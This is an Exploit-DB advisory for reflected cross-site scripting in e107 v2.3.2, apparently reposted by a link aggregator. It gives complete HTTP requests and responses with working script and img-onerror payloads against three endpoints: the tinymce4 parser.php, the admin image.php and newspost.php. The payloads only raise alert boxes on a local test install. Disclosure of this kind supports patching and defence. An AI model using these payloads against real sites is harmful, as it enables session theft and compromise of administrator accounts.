4
[webapps] e107 v2.3.2 - Reflected XSS
source link: https://www.exploit-db.com/exploits/51449
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
e107 v2.3.2 - Reflected XSS
EDB-ID:
51449
EDB Verified:
# Exploit Title: e107 v2.3.2 - Reflected XSS
# Date: 11/05/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 2.3.2
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### XSS Reflected - unauthorized
URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php
Parameters: content
# POC
Request:
POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 1126
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: text/html, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml
Response:
HTTP/1.1 200 OK
Date: Thu, 11 May 2023 19:38:45 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1053
Connection: close
Content-Type: text/html; charset=UTF-8
<!-- bbcode-html-start --><p><strong>Lore"/><script>alert(1)</script>bb
### XSS Reflected - Authorized
URL: http://127.0.0.1/e107/e107_admin/image.php
Parameters: for
# POC 1
Request:
GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Response:
HTTP/1.1 200 OK
Date: Thu, 04 May 2023 03:07:35 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "37f107dbe6a998ecf7b71689627c2a56"
Content-Length: 12420
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: hacked">bbbbb</title>
<meta charset='utf-8' />
<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
<!-- *CSS* -->
[...]
<div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path=">
<p>No HTML5 support.</p>
</div>
[...]
# POC 2
URL: http://127.0.0.1/e107/e107_admin/newspost.php
Parameters: Payload in URL
Request:
GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8
Connection: close
Response:
HTTP/1.1 200 OK
Date: Fri, 05 May 2023 06:21:53 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "d127dd6a44a22e093fed60b83bf36af2"
Content-Length: 72914
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
<!doctype html>
<html lang="en">
<head>
<title>News - List - Admin Area :: hacked">bbbbb</title>
<meta charset='utf-8' />
<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
<!-- *CSS* -->
[...]
<a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h">
<script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a>
[...]
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK